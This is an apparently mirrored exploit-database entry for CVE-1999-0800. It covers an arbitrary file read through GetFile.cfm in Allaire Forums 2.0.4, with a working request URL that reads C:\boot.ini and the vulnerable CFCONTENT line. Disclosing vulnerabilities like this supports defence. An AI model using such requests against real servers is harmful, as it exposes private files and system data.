[] NeoSense
E X P L O I T S
title author type platform port cve id

Allaire Forums 2.0.4 - Getfile

Author: Cameron Childress
type: remote
platform: multiple
port: 
date_added: 1999-02-11 
date_updated: 2012-06-16 
verified: 1 
codes: CVE-1999-0800;OSVDB-944 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/229/info

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier.

Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes") where C:\boot.ini is the pathname and file to read.

The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#">
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.